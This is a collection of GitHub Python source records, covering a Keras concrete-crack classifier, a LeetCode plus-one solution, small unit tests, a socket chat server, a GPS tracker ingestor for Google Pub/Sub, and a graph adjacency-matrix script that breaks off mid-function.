  \r\n    x = layers.BatchNormalization()(x) # batch normalization\r\n    \r\n    #x = layers.Activation(\"relu\")(x) # ReLU activation\r\n    x = layers.Activation('relu')(x)\r\n    \r\n    return x # return the result of one standard convolution'''\r\n    \r\n#(2) depthwise separable convolution block\r\ndef depthwise_conv_block(input_tensor, point_filters,alpha, depth_multiplier,kernel_size=(3,3), strides=(1,1)):\r\n    \r\n    # the hyperparameter alpha scales the number of pointwise conv kernels\r\n    point_filters = int(point_filters*alpha)\r\n    \r\n    # (1) depthwise conv -- outputs as many feature maps as the input has channels\r\n    x = layers.DepthwiseConv2D(kernel_size=kernel_size, # kernel size\r\n                               strides=strides, # stride\r\n                               padding='same', # with strides=1 the feature-map size is unchanged\r\n                               depth_multiplier=depth_multiplier, # hyperparameter scaling the intermediate feature maps\r\n                               use_bias=False)(input_tensor) # no bias needed when a BN layer follows\r\n    \r\n    x = layers.BatchNormalization()(x) # batch normalization\r\n    \r\n    x = layers.Activation('relu')(x) # ReLU activation\r\n    \r\n    # (2) pointwise conv -- a standard 1x1 convolution\r\n    x = layers.Conv2D(point_filters, kernel_size=(1,1), # 1x1 kernel\r\n                      padding='same', # feature-map size is unchanged\r\n                      strides=(1,1), # stride 1: convolve every pixel of the feature map\r\n                      use_bias=False)(x) # BN layer follows, no bias needed\r\n    \r\n    x = layers.BatchNormalization()(x) # batch normalization\r\n    \r\n    x = layers.Activation('relu')(x) # activation\r\n    \r\n    return x # return the depthwise separable convolution result\r\n\r\n\r\n\r\n\r\n'''zm change 2021.4.26 simplified version of the model structure'''\r\n# V3.0 try AlexNet\r\ndef make_model_MobileNetV1(classes, input_shape, alpha, depth_multiplier, dropout_rate):\r\n    inputs = Input(shape=input_shape)\r\n    #inputs = np.expand_dims(inputs, 
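A rough parameter count behind the pruning notes above: a standard K x K convolution from C_in to C_out channels costs K*K*C_in*C_out weights, while the depthwise separable block costs roughly K*K*C_in*d + C_in*d*C_out with d = depth_multiplier. A sketch:

def standard_conv_params(k, c_in, c_out):
    return k * k * c_in * c_out

def separable_conv_params(k, c_in, c_out, d=1):
    return k * k * c_in * d + c_in * d * c_out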
axis=3)\r\n\r\n    #Parameter meaning: number of convolutional kernels, convolutional kernel size, step size and padding mode, \r\n    #same means padding with 0 for edges, valid means no padding\r\n    x = depthwise_conv_block(inputs,32, alpha, depth_multiplier,kernel_size=(8,8), strides=(2,2))#50*50*32\r\n    x = layers.MaxPooling2D(pool_size=(3,3),strides=(2,2))(x)#24*24*32\r\n    x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n    x = depthwise_conv_block(x,16, alpha, depth_multiplier,kernel_size=(5,5), strides=(1,1))#24*24*16\r\n    x = layers.MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x)#11*11*16\r\n    x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n    '''x = layers.Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding=\"same\")(x)\r\n    x = layers.Activation(\"relu\")(x)\r\n    x = layers.BatchNormalization()(x)'''\r\n\r\n    # Add a new conv layer\r\n    '''x = layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding=\"same\")(x)\r\n    x = layers.Activation(\"relu\")(x)\r\n    x = layers.BatchNormalization()(x)'''\r\n\r\n    x = depthwise_conv_block(x,128, alpha, depth_multiplier,kernel_size=(3,3), strides=(1,1))#11*11*128\r\n    #x = layers.MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x)#5*5*8\r\n    #x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n    # x = layers.Flatten()(x)\r\n    # x = layers.Dense(48)(x)\r\n    # x = layers.Activation(\"relu\")(x)\r\n    # x = layers.BatchNormalization()(x)\r\n    # x = layers.Dropout(rate=Dropoutrate)(x)\r\n    '''1. fully connected layer\r\n    x = layers.Dense(96)(x)\r\n    # x = layers.Activation(\"relu\")(x)\r\n    # x = layers.BatchNormalization()(x)\r\n    # x = layers.Dropout(rate=Dropoutrate)(x)\r\n    '''\r\n\r\n\r\n    # # always softmax\r\n    # if classes == 1111:\r\n    #     activation = \"sigmoid\"\r\n    #     units = 1\r\n    # else:\r\n    #     activation = \"softmax\"\r\n    #     units = classes\r\n\r\n    #x = layers.Dense(units)(x)\r\n    #outputs = layers.Activation(activation=activation)(x)\r\n    #outputs = layers.Dense(units=units, activation=activation)(x)\r\n    x = layers.GlobalAveragePooling2D()(x) # average over the spatial dimensions, one value per channel\r\n    \r\n    # the hyperparameter alpha scales the number of kernels (feature maps)\r\n    shape = (1, 1, int(128 * alpha))\r\n    #shape = (1, 1, 1024)\r\n    # reshape the output x to that number of feature maps\r\n    x = layers.Reshape(target_shape=shape)(x)\r\n    \r\n    # Dropout randomly drops neurons to prevent overfitting\r\n    x = layers.Dropout(rate=dropout_rate)(x)\r\n    \r\n    # conv layer that maps the feature maps to the number of classes\r\n    x = layers.Conv2D(classes, kernel_size=(1,1), padding='same')(x)\r\n    \r\n    # softmax turns the scores into class probabilities\r\n    x = layers.Activation('softmax')(x)\r\n    \r\n    # reshape the probabilities into a flat (classes,) vector\r\n    x = layers.Reshape(target_shape=(classes,))(x)\r\n\r\n\r\n    print(type(inputs))\r\n    print(type(x))\r\n    outputs = Model(inputs, x)\r\n    return outputs\r\n\r\n\r\n# Read image file paths and labels; pairing each image with its label builds the dataset\r\n# normal--0, crack--1\r\ndef IMG_Lst(dataset_root):\r\n    images_list = np.array([])\r\n    labels_list = np.array([])\r\n    '''zm change 2021.4.26 changed the input path'''\r\n    # build the dataset the model needs by matching images to their labels: normal = intact images, crack = images containing cracks \r\n    for root, dirs, files in os.walk(dataset_root + '/normal'):\r\n        for file in files:\r\n            images_list = np.append(images_list, root + '/' + file)\r\n            labels_list = np.append(labels_list,[0])\r\n    for root, dirs, files in os.walk(dataset_root + '/crack'):\r\n        for file in files:\r\n            images_list = np.append(images_list, root + '/' + file)\r\n            labels_list = np.append(labels_list,[1])\r\n    return images_list, labels_list\r\n\r\ndef IMG_RD(images_list, label_list, Image_resize):\r\n    img_lst = []\r\n    for i in range(len(images_list)):\r\n        # cv2.imread(filename, flag) reads an image; 1 means color (BGR by default)\r\n        img_tmp = cv2.imread(images_list[i], 1)  # 0 = grayscale, 1 = BGR\r\n        img_tmp = cv2.cvtColor(img_tmp, 
cv2.COLOR_BGR2RGB)#BGR=>RGB\r\n        #print(\"---------------------------------------\")\r\n        # print(img_tmp.shape)\r\n        img_tmp_rsz = cv2.resize(img_tmp, Image_resize, interpolation=cv2.INTER_CUBIC)\r\n        # print(\"---------------------------------------\")\r\n        # print(img_tmp_rsz.shape)\r\n        # print(\"---------------------------------------\")\r\n        #img_tmp_rsz = np.expand_dims(img_tmp_rsz, axis=3)\r\n\r\n        img_lst.append(img_tmp_rsz)\r\n    return np.array(img_lst), label_list\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    # *******************************************************************\r\n    # Data loading and preprocessing\r\n\r\n    \r\n    # read the RGB images of the training and test/validation sets and resize them all to Image_resize\r\n    images_list, labels_list = IMG_Lst('C:/Users/13291/Desktop/dcds/CHECK')#Concrete Crack Images for Classification\r\n    Trainset_image, Trainset_label = IMG_RD(images_list, labels_list, Image_resize)\r\n    Trainset_label_one_hot = tf.keras.utils.to_categorical(Trainset_label, num_classes=2)\r\n    print('Read Images Done!')\r\n    print(np.size(Trainset_image))\r\n    # shuffle the images randomly\r\n    c = list(zip(Trainset_image, Trainset_label, Trainset_label_one_hot)) # zip images and labels together so shuffling keeps each element aligned\r\n    c = [i for i in c]\r\n    random.shuffle(c) # shuffle c\r\n    Trainset_image[:], Trainset_label[:], Trainset_label_one_hot[:] = zip(*c) # unzip the shuffled c\r\n\r\n    # *******************************************************************\r\n    # Building Models with Keras\r\n    # input_shape=(rows, cols, channels) data_format='channels_last'(default).\r\n    model = make_model_MobileNetV1(classes=2, # number of classes\r\n                                   input_shape=[99,99,3], # input image shape\r\n                                   alpha=1.0, # hyperparameter scaling the number of conv kernels\r\n                                   depth_multiplier=1, # hyperparameter controlling the image resolution\r\n                                   dropout_rate=1e-3) # probability of randomly dropping neurons\r\n    model.summary()\r\n\r\n    # ******************************************************************\r\n    # Compile and train the model\r\n    model.compile(\r\n        optimizer=\"adam\", # keras.optimizers.Adam(),\r\n        loss=\"categorical_crossentropy\", # keras.losses.mean_squared_error, # \"categorical_crossentropy\",\r\n        metrics=['accuracy', keras.metrics.categorical_accuracy] # [keras.metrics.binary_accuracy] # [\"accuracy\"]\r\n    )\r\n    \r\n    filepath=\"C:/Users/13291/Desktop/dcds/1.03_weights.best.h5\"\r\n    # keep only the best checkpoint\r\n    checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')\r\n    callbacks_list = [checkpoint]\r\n    \r\n    history = model.fit(\r\n        Trainset_image, Trainset_label_one_hot,\r\n        epochs=epochs,\r\n        batch_size=BATCH_SIZE,\r\n        callbacks=callbacks_list,\r\n        validation_split = 0.2, # hold out 20% of the training data for validation\r\n        #validation_freq = 1, # validate every epoch\r\n        #validation_data = (Trainset_image * 1.0 / 255, Trainset_label_one_hot),\r\n        # callbacks=callbacks,\r\n    )\r\n\r\n    model.save('C:/Users/13291/Desktop/dcds/1.03_CrackImage_v1.00_Model_b%d_e%d_d%f.h5' % (BATCH_SIZE, epochs, Dropoutrate))\r\n    \r\n    # ******************************************************************\r\n    # validation-accuracy curve\r\n    val_accuracy = history.history['val_accuracy']\r\n    epochs_range = range(epochs)\r\n    plt.figure(figsize=(8, 8))\r\n    plt.plot(epochs_range, val_accuracy, label='Validation Accuracy')\r\n    plt.legend(loc='lower right')\r\n    plt.title('Validation Accuracy')\r\n    plt.savefig('C:/Users/13291/Desktop/dcds/1.03_val_accuracy_b%d_e%d_d%f_1.jpg' % (BATCH_SIZE, epochs, Dropoutrate))\r\n    plt.show()\r\n    \r\n    # validation-loss curve\r\n    val_loss = history.history['val_loss']\r\n    epochs_range = range(epochs)\r\n    plt.figure(figsize=(8, 8))\r\n    plt.plot(epochs_range, val_loss, label='Validation Loss')\r\n    plt.legend(loc='lower right')\r\n    plt.title('Validation Loss')\r\n    
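Preprocessing-consistency note: fit() above receives the raw 0-255 images, while the commented-out validation_data line rescales by 1/255. Whichever convention is used, training and inference inputs must match; a hedged sketch:

# Trainset_image = Trainset_image.astype('float32') / 255.0  # apply the same scaling at inference time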
plt.savefig('C:/Users/13291/Desktop/dcds/1.03_Validation_loss_b%d_e%d_d%f.jpg' % (BATCH_SIZE, epochs, Dropoutrate))\r\n plt.show()\r\n \r\n \r\n # ******************************************************************a\r\n # 测试数据集的验证\r\n # 读取训练数据集及测试/验证数据集的RGB图像,将所有图像resize为image_size的大小\r\n # images_list, labels_list = IMG_Lst('Concrete Crack Images for Classification')\r\n # Testset_image, Testset_label = IMG_RD(images_list, labels_list, Image_resize)\r\n # Testset_label_one_hot = keras.utils.to_categorical(Testset_label, num_classes=2)\r\n # print('Read Images Done!')\r\n #\r\n # # load model\r\n # model = keras.models.load_model('1.03_weights.best.h5')\r\n # loss_and_metrics = model.evaluate(Testset_image, Testset_label_one_hot)\r\n # print(loss_and_metrics)\r\n # Testset_pred = model.predict(Testset_image, batch_size=BATCH_SIZE)\r\n # Testset_pred_label = np.argmax(Testset_pred, axis=1)\r\n # print(\"Test Accuracy = \", (Testset_pred_label == Testset_label).mean() * 100)\r\n #Trainset_pred = model.predict(Trainset_image, batch_size=BATCH_SIZE)\r\n #Trainset_pred_label = np.argmax(Trainset_pred, axis=1)\r\n #print(\"Train Accuracy = \", (Trainset_pred_label == Trainset_label).mean() * 100)\r\n\r\n # 绘制ROC 计算AUC # 在windows下完成\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TVT233/Crack-detection-CNN-","sub_path":"CrackImage.py","file_name":"CrackImage.py","file_ext":"py","file_size_in_byte":13119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70376253371","text":"\"\"\"\nYou are given a large integer represented as an integer array digits, where each digits[i] is the ith digit of the integer. \nThe digits are ordered from most significant to least significant in left-to-right order. 
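The model above leans entirely on the depthwise_conv_block helper, which is defined earlier in the file and not visible in this excerpt. As a hedged reference, a minimal MobileNetV1-style depthwise separable block consistent with the call sites might look like the sketch below; the relu6 activations, 'same' padding and applying the alpha width multiplier on the pointwise stage are assumptions, not the repository's confirmed implementation.

# A minimal sketch of a MobileNetV1-style depthwise separable block, assuming the
# signature used by the call sites above; not the repository's actual implementation.
from tensorflow.keras import layers

def depthwise_conv_block(x, filters, alpha, depth_multiplier, kernel_size=(3, 3), strides=(1, 1)):
    # depthwise stage: one spatial filter per input channel
    x = layers.DepthwiseConv2D(kernel_size, strides=strides, padding='same',
                               depth_multiplier=depth_multiplier, use_bias=False)(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU(6.0)(x)
    # pointwise stage: a 1x1 convolution mixes channels; alpha scales the layer width
    x = layers.Conv2D(int(filters * alpha), (1, 1), padding='same', use_bias=False)(x)
    x = layers.BatchNormalization()(x)
    return layers.ReLU(6.0)(x)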
{"seq_id":"70376253371","text":"\"\"\"\nYou are given a large integer represented as an integer array digits, where each digits[i] is the ith digit of the integer. \nThe digits are ordered from most significant to least significant in left-to-right order. \nThe large integer does not contain any leading 0's.\n\nIncrement the large integer by one and return the resulting array of digits.\n\nExample 1:\n\nInput: digits = [1,2,3]\nOutput: [1,2,4]\nExplanation: The array represents the integer 123.\nIncrementing by one gives 123 + 1 = 124.\nThus, the result should be [1,2,4].\nExample 2:\n\nInput: digits = [4,3,2,1]\nOutput: [4,3,2,2]\nExplanation: The array represents the integer 4321.\nIncrementing by one gives 4321 + 1 = 4322.\nThus, the result should be [4,3,2,2].\nExample 3:\n\nInput: digits = [9]\nOutput: [1,0]\nExplanation: The array represents the integer 9.\nIncrementing by one gives 9 + 1 = 10.\nThus, the result should be [1,0].\n\n\nSolution:\n    Walk the list from the last digit to the first. Add one to the current digit; if the sum is divisible\n    by 10, store 0 and carry the increment to the next digit on the left, otherwise store the sum and stop.\n    If a carry is still pending after the loop, insert a leading 1.\n\n\"\"\"\n\n\nclass Solution(object):\n    def plusOne(self, digits):\n        \"\"\"\n        :type digits: List[int]\n        :rtype: List[int]\n        \"\"\"\n        break_it = False\n        increment = False\n        length = len(digits)\n        for i in range(length):\n            last_index = length - i - 1\n            digit = digits[last_index]\n            increment_by_1 = digit+1\n            remainder = increment_by_1%10 \n            if remainder == 0:\n                digits[last_index] = 0\n                increment = True\n            else:\n                digits[last_index] = increment_by_1\n                increment = False\n                break_it = True\n            if break_it:\n                break\n        if increment:\n            digits.insert(last_index, 1)\n\n        return digits","repo_name":"LaxminarayanaV7416/javaPractice","sub_path":"DSAlgoPracPython/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"18862750175","text":"import unittest\nfrom poo_python.exos_facile.exo1 import Rectangle\n\n# create a test class\n\nclass TestExo1(unittest.TestCase):\n    \n    def setUp(self):\n        self.calcul = Rectangle(5, 10)\n        self.calcul2 = Rectangle(3, 4)\n        self.calcul3 = Rectangle(\"m\", 4)\n    \n    def tearDown(self):\n        del self.calcul\n        del self.calcul2\n        del self.calcul3\n    \n    def test_surface(self):\n        self.assertEqual(self.calcul.surface(), 50)\n        self.assertEqual(self.calcul2.surface(), 12)\n        with self.assertRaises(Exception) as context:\n            self.calcul3.surface()\n        self.assertTrue(\"error\" in str(context.exception))\n    \n# to run the test script\n# if __name__ == '__main__':\n#     unittest.main()\n","repo_name":"Franec59/uniteCI","sub_path":"testExo1.py","file_name":"testExo1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"3714232995","text":"import json\nimport os\n\nimport requests\nfrom pip_services4_components.config import ConfigParams\nfrom pip_services4_components.refer import References, Descriptor\n\nfrom ..Dummy import Dummy\nfrom ..DummyService import DummyService\nfrom ..SubDummy import SubDummy\nfrom ..controllers.DummyRestController import DummyRestController\n\n\ndef get_fullpath(filepath):\n    return os.path.abspath(os.path.join(os.path.dirname(__file__), filepath))\n\n\nport = 3007\n\nrest_config = ConfigParams.from_tuples(\n    'connection.protocol',\n    'https',\n    'connection.host',\n    'localhost',\n    'connection.port',\n    port,\n    'credential.ssl_key_file', get_fullpath('../credentials/ssl_key_file'),\n    'credential.ssl_crt_file', get_fullpath('../credentials/ssl_crt_file')\n)\n\nDUMMY1 = 
Dummy(None, 'Key 1', 'Content 1', [SubDummy('SubKey 1', 'SubContent 1')])\nDUMMY2 = Dummy(None, 'Key 2', 'Content 2', [SubDummy('SubKey 2', 'SubContent 2')])\n\n\nclass TestDummyCredentialsRestController:\n srv = None\n controller = None\n\n @classmethod\n def setup_class(cls):\n cls.srv = DummyService()\n\n cls.controller = DummyRestController()\n cls.controller.configure(rest_config)\n\n references = References.from_tuples(\n Descriptor(\"pip-controller-dummies\", \"service\", \"default\", \"default\", \"1.0\"), cls.srv,\n Descriptor(\"pip-controller-dummies\", \"controller\", \"http\", \"default\", \"1.0\"), cls.controller\n )\n\n cls.controller.set_references(references)\n\n def setup_method(self, method):\n self.controller.open(None)\n\n def teardown_method(self, method):\n self.controller.close(None)\n\n def test_crud_operations(self):\n # Create one dummy\n response = self.invoke(\"/dummies\", DUMMY1.to_json())\n\n dummy1 = Dummy.from_json(response)\n assert dummy1 is not None\n assert DUMMY1.key == dummy1.key\n assert DUMMY1.content == dummy1.content\n\n # Create another dummy\n response = self.invoke(\"/dummies\", DUMMY2.to_json())\n\n dummy2 = Dummy.from_json(response)\n\n assert dummy2 is not None\n assert DUMMY2.key == dummy2.key\n assert DUMMY2.content == dummy2.content\n\n # dummy_del = self.invoke('/dummies/')\n\n assert 2 == self.controller.get_number_of_calls()\n\n def invoke(self, route, entity):\n params = {}\n route = f\"https://localhost:{port}{route}\"\n response = None\n timeout = 5\n try:\n # Call the service\n data = json.dumps(entity)\n response = requests.request('POST', route, params=params, json=data, timeout=timeout, verify=False)\n return response.json()\n except Exception as ex:\n raise ex\n","repo_name":"pip-services4/pip-services4-python","sub_path":"pip-services4-http-python/test/controllers/test_DummyCredentialsRestController.py","file_name":"test_DummyCredentialsRestController.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37548297045","text":"import socket\nimport threading\n\nserverIP = \"127.0.0.1\"\nserver_port = 9008\nbuff_size = 1024\nbuff_size_udp = 65507\n\n\nclass Server:\n def __init__(self):\n self.server_tcp = None\n self.server_udp = None\n self.threads = []\n self.client_id = 0\n self.sockets = []\n self.nicknames = []\n self.colors = []\n self.addresses = []\n\n # run server (main function)\n def run(self):\n # servers initialization\n self.tcp_initialization()\n self.udp_initialization()\n\n # run udp service - ready to receive and send messages using udp protocol\n self.run_thread(self.udp_service)\n\n # main server loop\n while True:\n print('Waiting for connection...')\n client, address = self.server_tcp.accept()\n print('New client connected!: ', address)\n\n nickname, client_color = self.receive_tcp(client).split('|') # receive client nickname\n print('New client: (%s, %s)' % (self.client_id, nickname))\n\n self.sockets.append(client)\n self.nicknames.append(nickname)\n self.colors.append(client_color)\n self.addresses.append(address)\n\n # create new thread to communication with tcp client\n self.run_thread(self.tcp_service, client, self.client_id, address, nickname, client_color)\n\n self.client_id += 1\n\n # server initialization - TCP socket\n def tcp_initialization(self):\n server_socket_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket_tcp.bind((serverIP, server_port))\n server_socket_tcp.listen() 
# enable a server to accept connections.\n print('Python server is running - TCP...')\n\n self.server_tcp = server_socket_tcp\n\n # server initialization - UDP socket\n def udp_initialization(self):\n server_socket_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_socket_udp.bind((serverIP, server_port))\n print('Python server is running - UDP...')\n\n self.server_udp = server_socket_udp\n\n # receive message from client using UDP\n def receive_udp(self):\n data, address_udp = self.server_udp.recvfrom(buff_size_udp)\n # data = data.decode('utf-8')\n client_id, client_nickname, color = self.get_client_info(address_udp)\n\n print(f'New UDP msg received from ({client_id, client_nickname})!: ', data)\n\n if data == 'EXIT'.encode('utf-8'):\n self.server_udp.sendto(bytes('EXIT', 'utf-8'), address_udp)\n self.server_udp.sendto(bytes('UDP unbind successfully', 'utf-8'), address_udp)\n return None, client_id, client_nickname, address_udp, color\n return data, client_id, client_nickname, address_udp, color\n\n # receive message from client using TCP\n def receive_tcp(self, client_socket, *args):\n data = client_socket.recv(buff_size).decode('utf-8')\n if args:\n print('New msg received from (%d, %s)!: ' % args, data)\n return data\n\n # send message to clients using TCP\n def send_tcp(self, message, sender_socket, sender_nickname, sender_id, color):\n try:\n for sock in self.sockets:\n if sock != sender_socket:\n all_msg = f\"{sender_id}|{sender_nickname}|{message}|{color}\"\n sock.send(bytes(all_msg, 'utf-8'))\n except socket.error as err:\n print('Failed to send message to client: %s' % err)\n\n # send message to clients using UDP\n def send_udp(self, message, sender_address, sender_nickname, sender_id, color):\n for address in self.addresses:\n if address != sender_address:\n info = f\"{sender_id}|{sender_nickname}|{color}\"\n self.server_udp.sendto(bytes(info, 'utf-8'), address)\n self.server_udp.sendto(message, address)\n\n # TCP service using by thread\n def tcp_service(self, client_socket, client_id, client_address, client_name, color):\n try:\n while True:\n received_data = self.receive_tcp(client_socket, client_id, client_name)\n if received_data == 'EXIT' or not received_data:\n client_socket.send(bytes('EXIT', 'utf-8'))\n return\n # send message to clients\n self.send_tcp(received_data, client_socket, client_name, client_id, color)\n\n except socket.error:\n print('Problem with client. 
Disconnecting...')\n # self.disconnect_client(client_socket, client_address, client_name, client_id, color)\n\n finally:\n self.disconnect_client(client_socket, client_address, client_name, client_id, color)\n\n # UDP service using by thread\n def udp_service(self):\n client_id = ''\n client_nickname = ''\n try:\n print('UDP connection starting\\n')\n while True:\n data, client_id, client_nickname, addr_udp, color = self.receive_udp()\n if data:\n self.send_udp(data, addr_udp, client_nickname, client_id, color)\n finally:\n print(f'UDP connection for ({client_id}, {client_nickname}) closed')\n\n # receive responses from server using new thread\n # (udp_service = first thread, tcp_service = second thread)\n def run_thread(self, target_fun, *args):\n if args:\n thread_args = args\n else:\n thread_args = ()\n\n thr = threading.Thread(target=target_fun, args=thread_args)\n thr.daemon = True\n self.threads.append(thr)\n thr.start()\n\n # disconnect client - remove from server 'db' (client, client_nicknames arrays)\n def disconnect_client(self, client_socket, client_address, client_name, client_id, color):\n self.sockets.remove(client_socket)\n self.addresses.remove(client_address)\n self.nicknames.remove(client_name)\n self.colors.remove(color)\n\n print(f\"Client: ({client_id}, {client_name}) left the server\")\n client_socket.close()\n\n # get info about client sending msg by UDP\n def get_client_info(self, address_udp):\n # get index of address_udp from clients addresses array\n address_id = self.addresses.index(address_udp)\n\n # find client nickname and color\n color = self.colors[address_id]\n nickname = self.nicknames[address_id]\n\n return address_id, nickname, color\n\n def stop(self):\n self.server_udp.close()\n self.server_tcp.close()\n\n\nif __name__ == \"__main__\":\n server = Server()\n server.run()\n","repo_name":"dmncp/Python-Chat","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16738145065","text":"from google.cloud import pubsub\nimport datetime\nimport requests\nimport pytz\nimport json\nimport time\nimport os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"/app/application_default_credentials.json\"\n#os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"/home/kali/iot-projects/ioh-stp/ingestor-sm/application_default_credentials.json\"\n\nos.environ.setdefault(\"GCLOUD_PROJECT\", \"ioh-simulator\")\n\n#from google.oauth2 import service_account\n\n#credentials = service_account.Credentials.from_service_account_file(\"/home/kali/iot-projects/ioh-stp/ingestor-sm/application_default_credentials.json\")\n#client = language.LanguageServiceClient(credentials=credentials)\n\n# Imports the Cloud Logging client library\nimport google.cloud.logging\n\n# Instantiates a client\nclientlog = google.cloud.logging.Client()\n\n# Retrieves a Cloud Logging handler based on the environment\n# you're running in and integrates the handler with the\n# Python logging module. 
By default this captures all logs\n# at INFO level and higher\nclientlog.setup_logging()\n\nimport logging\n\ndef publish_pubsub(project_id,topic_id, msg):\n publisher = pubsub.PublisherClient()\n topic_path = publisher.topic_path(project_id, topic_id)\n\n data_str = json.dumps(msg,separators=(',',':'))\n # Data must be a bytestring\n data = data_str.encode(\"utf-8\")\n # When you publish a message, the client returns a future.\n future = publisher.publish(topic_path, data)\n\n print(future.result())\n print(f\"Published messages to {topic_path}.\")\n return future.result()\n \ndef stream_data(url):\n # Get the URL\n global last_data\n response = requests.get(url)\n\n status = response.json()['DEVICE']['STATUS']\n command = response.json()['DEVICE']['COMMAND']\n ndata = response.json()['DEVICE']['NDATA']\n \n time_local = response.json()['DEVICE']['DATA'][0]['TIME']\n local = pytz.timezone('Asia/Jakarta')\n naive = datetime.datetime.strptime(time_local,\"%Y-%m-%d %H:%M:%S\")\n local_dt = local.localize(naive, is_dst=None)\n utc_dt = local_dt.astimezone(pytz.utc)\n timestamp = int(round(utc_dt.timestamp()*1000))\n \n imei = response.json()['DEVICE']['DATA'][0]['IMEI']\n name = response.json()['DEVICE']['DATA'][0]['NAME']\n longitude = response.json()['DEVICE']['DATA'][0]['LONGITUDE']\n latitude = response.json()['DEVICE']['DATA'][0]['LATITUDE']\n speed = response.json()['DEVICE']['DATA'][0]['SPEED']\n heading = response.json()['DEVICE']['DATA'][0]['HEADING']\n moving = response.json()['DEVICE']['DATA'][0]['MOVING']\n\n if moving == \"0\":\n moving = False\n else:\n moving = True\n\n battery = response.json()['DEVICE']['DATA'][0]['BATTERY']\n main_voltage = response.json()['DEVICE']['DATA'][0]['MAIN_VOLTAGE']\n gsm_signal = response.json()['DEVICE']['DATA'][0]['GSM_SIGNAL']\n address = response.json()['DEVICE']['DATA'][0]['ADDRESS']\n\n mylist = {\n \"type\" : \"inboundDataEventMsg\", \n \"networkId\" : \"tracker-fmc130-netw-dummy1\", \n \"deviceId\" : str(imei)+'-dummy1', #macId\n \"aliasKey\" : \"imei\",\n \"data\": [\n { \"path\" : \"status\", \"value\" : status},\n { \"path\" : \"command\", \"value\" : command},\n { \"path\" : \"ndata\", \"value\" : ndata},\n { \"path\" : \"data/time\", \"value\" : timestamp},\n { \"path\" : \"data/imei\", \"value\" : str(imei)+'-dummy1'},\n { \"path\" : \"data/position/lat\", \"value\" : float(latitude)},\n { \"path\" : \"data/position/lon\", \"value\" : float(longitude)},\n { \"path\" : \"data/speed\", \"value\" : speed},\n { \"path\" : \"data/heading\", \"value\" : heading},\n { \"path\" : \"data/moving\", \"value\" : moving},\n { \"path\" : \"data/battery\", \"value\" : battery},\n { \"path\" : \"data/main_voltage\", \"value\" : main_voltage},\n { \"path\" : \"data/gsm_signal\", \"value\" : gsm_signal},\n { \"path\" : \"data/address\", \"value\" : address},\n ]}\n\n project_id = 'ioh-simulator'\n topic_id = 'default-processor'\n\n\n if (last_data == None) or (last_data['DEVICE']['DATA'][0]['IMEI'] == imei and last_data['DEVICE']['DATA'][0]['TIME'] != time_local):\n msgID = publish_pubsub(project_id,topic_id, mylist)\n last_data = response.json()\n logging.info(json.dumps(response.json()))\n\nlast_data = None\n\ntry:\n while True:\n stream_data(\"https://mamigo.id/api/realtime/63f0a743e1e121845a4967c85f571dde\")\n time.sleep(10)\n\nexcept KeyboardInterrupt:\n print(\"exiting\")\n client.disconnect()\n 
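# NOTE: 'client' is never defined in this script; these two cleanup calls look like leftovers from an MQTT client and will raise NameError on Ctrl+C.\r\n    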
client.loop_stop()\r\n","repo_name":"riyandig71/ingestors","sub_path":"mcpTracker_main_v2.py","file_name":"mcpTracker_main_v2.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"3942468740","text":"import numpy as np\r\n# 2) Write code that prints the adjacency list, the adjacency matrix and the incidence matrix when the graph\r\n# is given by its edges, i.e. by pairs of vertices. Take into account whether the graph is directed or undirected.\r\n\r\n# inputs: the number of edges, the number of connections\r\n\r\ndef filling_list(ribs):\r\n    RibsList = [0] * ribs\r\n    for i in range(ribs):\r\n        print(\"Enter edge #\", i + 1)\r\n        RibsList[i] = [int(input()), int(input())]\r\n    print(\"Vertex pairs\")\r\n    print(RibsList)\r\n    return RibsList\r\n\r\ndef adjacency_matrix(LenghtList, ribs, RibsList):\r\n    print(\"Adjacency matrix\")\r\n    adjacency_matrix_list = [0] * LenghtList\r\n    for i in range(LenghtList):\r\n        adjacency_matrix_list[i] = [0] * LenghtList\r\n\r\n    if flag == 1:\r\n        coefficient = -1\r\n    else:\r\n        coefficient = 1\r\n\r\n    for i in range(ribs):\r\n        a = RibsList[i][0]\r\n        b = RibsList[i][1]\r\n        if RibsList[i][0] != RibsList[i][1]:\r\n            adjacency_matrix_list[a - 1][b - 1] = 1\r\n            adjacency_matrix_list[b - 1][a - 1] = 1 * coefficient\r\n\r\n    print(np.matrix(adjacency_matrix_list))\r\n    return adjacency_matrix_list\r\n\r\ndef adjacency_list(adjacency_matrix_list, LenghtList, ribs):\r\n    print(\"Adjacency list\")\r\n    for i in range(LenghtList):\r\n        temp_list = [i+1]\r\n        for j in range(LenghtList):\r\n            a = j + 1\r\n            if adjacency_matrix_list[i][j] == 1:\r\n                temp_list.append(a)\r\n\r\n        print(np.array(temp_list))\r\n        temp_list.clear()\r\n\r\ndef incidence_matrix(LenghtList, ribs, RibsList,):\r\n    